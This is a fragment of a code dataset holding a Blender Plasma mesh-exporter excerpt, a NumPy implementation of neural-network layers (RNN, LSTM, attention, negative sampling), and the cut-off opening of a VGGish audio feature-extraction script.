Step 0.8: Figure out which materials are attached to this object. Because Blender is backwards,\n # we can actually have materials that are None. gotdawgit!!!\n materials = [i for i in mesh.materials if i is not None]\n if not materials:\n return None\n\n # Step 1: Export all of the doggone materials.\n geospans = self._export_material_spans(bo, mesh, materials)\n\n # Step 2: Export Blender mesh data to Plasma GeometrySpans\n self._export_geometry(bo, mesh, materials, geospans)\n\n # Step 3: Add plGeometrySpans to the appropriate DSpan and create indices\n _diindices = {}\n for geospan, pass_index in geospans:\n dspan = self._find_create_dspan(bo, geospan.material.object, pass_index)\n self._report.msg(\"Exported hsGMaterial '{}' geometry into '{}'\",\n geospan.material.name, dspan.key.name, indent=1)\n idx = dspan.addSourceSpan(geospan)\n diidx = _diindices.setdefault(dspan, [])\n diidx.append(idx)\n\n # Step 3.1: Harvest Span indices and create the DIIndices\n drawables = []\n for dspan, indices in _diindices.items():\n dii = plDISpanIndex()\n dii.indices = indices\n idx = dspan.addDIIndex(dii)\n drawables.append((dspan.key, idx))\n return drawables\n\n def _export_material_spans(self, bo, mesh, materials):\n \"\"\"Exports all Materials and creates plGeometrySpans\"\"\"\n waveset_mod = bo.plasma_modifiers.water_basic\n if waveset_mod.enabled:\n if len(materials) > 1:\n msg = \"'{}' is a WaveSet -- only one material is supported\".format(bo.name)\n self._exporter().report.warn(msg, indent=1)\n matKey = self.material.export_waveset_material(bo, materials[0])\n geospan = self._create_geospan(bo, mesh, materials[0], matKey)\n\n # FIXME: Can some of this be generalized?\n geospan.props |= (plGeometrySpan.kWaterHeight | plGeometrySpan.kLiteVtxNonPreshaded |\n plGeometrySpan.kPropReverseSort | plGeometrySpan.kPropNoShadow)\n geospan.waterHeight = bo.location[2]\n return [(geospan, 0)]\n else:\n geospans = [None] * len(materials)\n for i, blmat in enumerate(materials):\n matKey = self.material.export_material(bo, blmat)\n geospans[i] = (self._create_geospan(bo, mesh, blmat, matKey), blmat.pass_index)\n return geospans\n\n def _find_create_dspan(self, bo, hsgmat, pass_index):\n location = self._mgr.get_location(bo)\n if location not in self._dspans:\n self._dspans[location] = {}\n\n # This is where we figure out which DSpan this goes into. To vaguely summarize the rules...\n # BlendSpans: anything with an alpha blended layer\n # SortSpans: means we should sort the spans in this DSpan with all other span in this pass\n # SortFaces: means we should sort the faces in this span only\n # We're using pass index to do just what it was designed for. Cyan has a nicer \"depends on\"\n # draw component, but pass index is the Blender way, so that's what we're doing.\n crit = _DrawableCriteria(bo, hsgmat, pass_index)\n\n if crit not in self._dspans[location]:\n # AgeName_[District_]_Page_RenderLevel_Crit[Blend]Spans\n # Just because it's nice to be consistent\n node = self._mgr.get_scene_node(location=location)\n name = \"{}_{:08X}_{:X}{}\".format(node.name, crit.render_level.level, crit.criteria, crit.span_type)\n dspan = self._mgr.add_object(pl=plDrawableSpans, name=name, loc=location)\n\n criteria = crit.criteria\n dspan.criteria = criteria\n if criteria & plDrawable.kCritSortFaces:\n dspan.props |= plDrawable.kPropSortFaces\n if criteria & plDrawable.kCritSortSpans:\n dspan.props |= plDrawable.kPropSortSpans\n dspan.renderLevel = crit.render_level.level\n dspan.sceneNode = node # AddViaNotify\n\n self._dspans[location][crit] = dspan\n return dspan\n else:\n return self._dspans[location][crit]\n\n @property\n def _mgr(self):\n return self._exporter().mgr\n\n @property\n def _report(self):\n return self._exporter().report\n","sub_path":"All_In_One/addons/korman/exporter/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":24400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"498306796","text":"import numpy as np\n\nfrom src.functions import softmax, cross_entropy_error, sigmoid\nfrom src.utils import UnigramSampler\n\n\nclass Affine:\n def __init__(self, W, b):\n self.params = [W, b]\n self.grads = [np.zeros_like(W), np.zeros_like(b)]\n self.x = None\n\n def forward(self, x):\n W, b = self.params\n self.x = x\n return np.dot(x, W) + b\n\n def backward(self, dout):\n W, b = self.params\n dx = np.dot(dout, W.T)\n dW = np.dot(self.x.T, dout)\n db = np.sum(dout, axis=0)\n self.grads[0][...] = dW\n self.grads[1][...] = db\n return dx\n\n\nclass Softmax:\n def __init__(self):\n self.params = []\n self.grads = []\n self.out = None\n\n def forward(self, x):\n self.out = softmax(x)\n return self.out\n\n def backward(self, dout):\n dx = dout * self.out\n sumdx = np.sum(dx, axis=1, keepdims=True)\n dx -= self.out * sumdx\n return dx\n\n\nclass SoftmaxWithLoss:\n def __init__(self):\n self.params = []\n self.grads = []\n\n self.y = None\n self.t = None\n\n def forward(self, x, t):\n self.y = softmax(x)\n self.t = t.argmax(axis=1) if t.shape == self.y.shape else t\n\n return cross_entropy_error(self.y, self.t)\n\n def backward(self, dout):\n batch_size = self.t.shape[0]\n\n dx = self.y.copy()\n dx[np.arange(batch_size), self.t] -= 1\n dx *= dout\n dx /= batch_size\n return dx\n\n\nclass Sigmoid:\n def __init__(self):\n self.params = []\n self.grads = []\n self.out = None\n\n def forward(self, x):\n out = 1 / (1 + np.exp(-x))\n self.out = out\n return out\n\n def backward(self, dout):\n return dout * self.out * (1 - self.out)\n\n\nclass SigmoidWithLoss:\n def __init_(self):\n self.params = []\n self.grads = []\n self.y = None\n self.t = None\n\n def forward(self, x, t):\n self.y = sigmoid(x)\n self.t = t\n loss = cross_entropy_error(np.c_[1 - self.y, self.y], t)\n return loss\n\n def backward(self, dout=1):\n batch_size = self.t.shape[0]\n dx = (self.y - self.t) * dout / batch_size\n return dx\n\n\nclass Matmul:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.x = None\n\n def forward(self, x):\n W, = self.params\n self.x = x\n return np.dot(x, W)\n\n def backward(self, dout):\n W, = self.params\n dx = np.dot(dout, W.T)\n dW = np.dot(self.x.T, dout)\n self.grads[0][...] = dW\n return dx\n\n\nclass Embedding:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.idx = None\n\n def forward(self, idx):\n W, = self.params\n self.idx = idx\n return W[idx]\n\n def backward(self, dout):\n dW, = self.grads\n dW[...] = 0\n np.add.at(dW, self.idx, dout)\n\n\nclass EmbeddingDot:\n def __init__(self, W):\n self.embed = Embedding(W)\n self.params = self.embed.params\n self.grads = self.embed.grads\n self.cache = None\n\n def forward(self, h, idx):\n target_W = self.embed.forward(idx)\n out = np.sum(target_W * h, axis=1)\n self.cache = (h, target_W)\n return out\n\n def backward(self, dout):\n h, target_W = self.cache\n dout = dout.reshape(dout.shape[0], 1)\n dtarget_W = dout * h\n self.embed.backward(dtarget_W)\n\n dh = dout * target_W\n return dh\n\n\nclass NegativeSamplingLoss:\n def __init__(self, W, corpus, power=0.75, sample_size=5):\n self.sample_size = sample_size\n self.sampler = UnigramSampler(corpus, power, sample_size)\n self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size+1)]\n self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size+1)]\n\n self.params = []\n self.grads = []\n for embed_dot_layer in self.embed_dot_layers:\n self.params += embed_dot_layer.params\n self.grads += embed_dot_layer.grads\n\n def forward(self, h, target):\n batch_size = target.shape[0]\n negative_targets = self.sampler.get_negative_sample(target)\n\n y = self.embed_dot_layers[0].forward(h, target)\n t = np.ones(batch_size, dtype=np.int32)\n loss = self.loss_layers[0].forward(y, t)\n\n t = np.zeros(batch_size, dtype=np.int32)\n for i in range(self.sample_size):\n negative_target = negative_targets[:, i]\n y = self.embed_dot_layers[i + 1].forward(h, negative_target)\n loss += self.loss_layers[i + 1].forward(y, t)\n\n return loss\n\n def backward(self, dout):\n dh = 0\n for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):\n dy = l0.backward(dout)\n dh += l1.backward(dy)\n return dh\n\n\nclass RNN:\n def __init__(self, Wx, Wh, b):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.cache = None\n\n def forward(self, x, h_prev):\n Wx, Wh, b = self.params\n t = np.dot(x, Wx) + np.dot(h_prev, Wh) + b\n h_next = np.tanh(t)\n self.cache = (x, h_prev, h_next)\n return h_next\n\n def backward(self, dh_next):\n Wx, Wh, b = self.params\n x, h_prev, h_next = self.cache\n\n dh = dh_next * (1 - h_next ** 2)\n dh_prev = np.dot(dh, Wh.T)\n dWh = np.dot(h_prev.T, dh)\n dx = np.dot(dh, Wx.T)\n dWx = np.dot(x.T, dh)\n db = np.sum(dh, axis=0)\n\n self.grads[0][...] = dWx\n self.grads[1][...] = dWh\n self.grads[2][...] = db\n return dx, dh_prev\n\n\nclass TimeRNN:\n def __init__(self, Wx, Wh, b, stateful):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.layers = None\n\n self.stateful = stateful\n self.h = None\n self.dh = None\n\n def set_state(self, h):\n self.h = h\n\n def reset_state(self):\n self.h = None\n\n def forward(self, xs):\n Wx, Wh, b = self.params\n N, T, D = xs.shape\n D, H = Wx.shape\n\n self.layers = []\n hs = np.empty((N, T, H), dtype='f')\n if not self.stateful or self.h is None:\n self.h = np.zeros((N, H), dtype='f')\n\n for t in range(T):\n layer = RNN(*self.params)\n self.h = layer.forward(xs[:, t, :], self.h)\n hs[:, t, :] = self.h\n self.layers.append(layer)\n\n return hs\n\n def backward(self, dhs):\n Wx, Wh, b = self.params\n N, T, H = dhs.shape\n D, H = Wx.shape\n\n dh = 0\n grads = [0, 0, 0]\n\n dxs = np.empty((N, T, D), dtype='f')\n\n for t in reversed(range(T)):\n layer = self.layers[t]\n dx, dh = layer.backward(dhs[:, t, :] + dh)\n dxs[:, t, :] = dx\n\n for i, grad in enumerate(layer.grads):\n grads[i] += grad\n\n for i, grad in enumerate(grads):\n self.grads[i][...] = grad\n self.dh = dh\n return dxs\n\n\nclass TimeEmbedding:\n def __init__(self, W):\n self.params = [W]\n self.grads = [np.zeros_like(W)]\n self.layers = None\n\n def forward(self, xs):\n W, = self.params\n N, T = xs.shape\n V, D = W.shape\n\n self.layers = []\n hs = np.empty((N, T, D), dtype='f')\n for t in range(T):\n layer = Embedding(W)\n h = layer.forward(xs[:, t])\n hs[:, t, :] = h\n self.layers.append(layer)\n\n return hs\n\n def backward(self, dout):\n N, T, D = dout.shape\n\n grad = 0\n for t in range(T):\n layer = self.layers[t]\n layer.backward(dout[:, t, :])\n grad += layer.grads[0]\n\n self.grads[0][...] = grad\n\n\nclass TimeAffine:\n def __init__(self, W, b):\n self.params = [W, b]\n self.grads = [np.zeros_like(W), np.zeros_like(b)]\n self.layers = None\n\n def forward(self, x):\n W, b = self.params\n N, T, D = x.shape\n\n rx = x.reshape(N * T, -1)\n out = np.dot(rx, W) + b\n self.x = x\n return out.reshape(N, T, -1)\n\n def backward(self, dout):\n W, b = self.params\n N, T, D = dout.shape\n x = self.x\n\n dout = dout.reshape(N * T, -1)\n rx = x.reshape(N * T, -1)\n\n db = np.sum(dout, axis=0)\n dW = np.dot(rx.T, dout)\n dx = np.dot(dout, W.T)\n dx = dx.reshape(*x.shape)\n\n self.grads[0][...] = dW\n self.grads[1][...] = db\n return dx\n\n\nclass TimeSoftmaxWithLoss:\n def __init__(self):\n self.params = []\n self.grads = []\n\n self.cache = None\n self.ignore_label = -1\n\n def forward(self, xs, ts):\n N, T, V = xs.shape\n\n if ts.ndim == 3:\n ts = ts.argmax(axis=2)\n mask = (ts != self.ignore_label)\n\n xs = xs.reshape(N * T, V)\n ts = ts.reshape(N * T)\n mask = mask.reshape(N * T)\n\n ys = softmax(xs)\n ls = np.log(ys[np.arange(N * T), ts])\n ls *= mask\n loss = -np.sum(ls)\n loss /= mask.sum()\n\n self.cache = (ts, ys, mask, (N, T, V))\n return loss\n\n def backward(self, dout=1):\n ts, ys, mask, (N, T, V) = self.cache\n\n dx = ys\n dx[np.arange(N * T), ts] -= 1\n dx *= dout\n dx /= mask.sum()\n dx *= mask[:, np.newaxis]\n dx = dx.reshape((N, T, V))\n return dx\n\n\nclass SimpleRNNLM:\n def __init__(self, vocab_size, word_vecs, hidden_size):\n V, D, H = vocab_size, word_vecs, hidden_size\n\n embed_W = (np.random.randn(V, D) / 100).astype('f')\n rnn_Wx = (np.random.randn(D, H) / np.sqrt(D)).astype('f')\n rnn_Wh = (np.random.randn(H, H) / np.sqrt(H)).astype('f')\n rnn_b = np.zeros(H).astype('f')\n\n affine_W = (np.random.randn(H, V) / np.sqrt(H)).astype('f')\n affine_b = np.zeros(V).astype('f')\n\n self.layers = [\n TimeEmbedding(embed_W),\n TimeRNN(rnn_Wx, rnn_Wh, rnn_b, stateful=True),\n TimeAffine(affine_W, affine_b)\n ]\n\n self.loss_layer = TimeSoftmaxWithLoss()\n self.rnn_layer = self.layers[1]\n\n self.params = []\n self.grads = []\n for layer in self.layers:\n self.params += layer.params\n self.grads += layer.grads\n\n def forward(self, xs, ts):\n for layer in self.layers:\n xs = layer.forward(xs)\n loss = self.loss_layer.forward(xs, ts)\n return loss\n\n def backward(self, dout=1):\n dout = self.loss_layer.backward(dout)\n for layer in reversed(self.layers):\n dout = layer.backward(dout)\n return dout\n\n def reset_state(self):\n self.rnn_layer.reset_state()\n\n\nclass LSTM:\n def __init__(self, Wx, Wh, b):\n self.params = [Wx, Wh, b]\n self.grads = [np.zeros_like(Wx), np.zeros_like(Wh), np.zeros_like(b)]\n self.cache = None\n\n def forward(self, x, h_prev, c_prev):\n Wx, Wh, b = self.params\n N, H = h_prev.shape\n\n A = np.dot(x, Wx) + np.dot(h_prev, Wh) + b\n\n f = sigmoid(A[:, 0*H:1*H])\n g = np.tanh(A[:, 1*H:2*H])\n i = sigmoid(A[:, 2*H:3*H])\n o = sigmoid(A[:, 3*H:4*H])\n\n c_next = c_prev * f + i * g\n h_next = np.tanh(c_next) * o\n\n self.cache = (x, h_prev, c_prev, i, f, g, o, c_next)\n\n return h_next, c_next\n\n def backward(self, dh_next, dc_next):\n Wx, Wh, b = self.params\n x, h_prev, c_prev, i, f, g, o, c_next = self.cache\n\n tanh_c_next = np.tanh(c_next)\n ds = (dh_next * o) * (1 - tanh_c_next ** 2) + dc_next\n\n dc_prev = ds * f\n\n di = ds * g\n df = ds * c_prev\n do = dh_next * tanh_c_next\n dg = ds * i\n\n di *= i * (1 - i)\n df *= f * (1 - f)\n do *= o * (1 - o)\n dg *= (1 - g ** 2)\n\n dA = np.hstack((df, dg, di, do))\n\n dWh = np.dot(h_prev.T, dA)\n dWx = np.dot(x.T, dA)\n db = dA.sum(axis=0)\n\n self.grads[0][...] = dWx\n self.grads[1][...] = dWh\n self.grads[2][...] = db\n\n dx = np.dot(dA, Wx.T)\n dh_prev = np.dot(dA, Wh.T)\n\n return dx, dh_prev, dc_prev\n\n\nclass WeighSum:\n def __init__(self):\n self.params = []\n self.grads = []\n self.cache = None\n\n def forward(self, hs, a):\n '''\n Args:\n hs(N, T, H)\n a(N, T)\n Returns:\n cs(N, H)\n '''\n\n N, T, H = hs.shape\n ar = a.reshape(N, T, 1).repeat(H, axis=2)\n t = hs * ar\n c = np.sum(t, axis=1)\n self.cache = (hs, ar)\n return c\n\n def backward(self, dc):\n '''\n Args:\n dc(N, H):\n Returns:\n dhs:\n da:\n '''\n hs, ar = self.cache\n N, T, H = hs.shape\n\n dt = dc.reshape(N, 1, H).repeat(T, axis=1)\n\n dar = dt * hs\n dhs = dt * ar\n\n da = np.sum(dar, axis=2)\n\n return dhs, da\n\n\nclass AttentionWeight:\n def __init__(self):\n self.params = []\n self.grads = []\n self.softmax = Softmax()\n self.cache = None\n\n def forward(self, hs, h):\n N, T, H = hs.shape\n hr = h.reshape(N, 1, H).repeat(T, axis=1)\n t = hs * hr\n s = np.sum(t, axis=2)\n a = self.softmax.forward(s)\n self.cache = (hs, hr)\n return a\n\n def backward(self, da):\n hs, hr = self.cache\n N, T, H = hs.shape\n\n ds = self.softmax.backward(da)\n dt = ds.reshape(N, T, 1).repeat(H, axis=2)\n\n dhr = dt * hs\n dhs = dt * hr\n\n dh = np.sum(dhr, axis=1)\n return dhs, dh\n\n\nclass Attention:\n def __init__(self):\n self.params = []\n self.grads = []\n self.attention_weight_layer = AttentionWeight()\n self.weight_sum_layer = WeighSum()\n self.attention_weight = None\n\n def forward(self, hs, h):\n a = self.attention_weight_layer.forward(hs, h)\n self.attention_weight = a\n c = self.weight_sum_layer.forward(hs, a)\n return c\n\n def backward(self, dc):\n dhs0, da = self.weight_sum_layer.backward(dc)\n dhs1, dh = self.attention_weight_layer.backward(da)\n dhs = dhs0 + dhs1\n return dhs, dh\n","sub_path":"src/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":14450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"373481195","text":"import csv\nimport os\nimport tensorflow as tf\nfrom tensorflow import app\nfrom tensorflow import flags\n\nimport numpy as np\nfrom scipy.io import wavfile\nimport six\n\nfrom pydub import AudioSegment\n\nimport vggish_input\nimport vggish_params\nimport vggish_postprocess\nimport vggish_slim\nfrom subprocess import call\n\nFLAGS = flags.FLAGS\n\nif __name__ == '__main__':\n flags.DEFINE_string('input_youtube_id_tsv', '/home/shakil/PSVA/data/output/eval/youtube_eval.txt',\n 'TSV file with lines \"\\t\\t\\t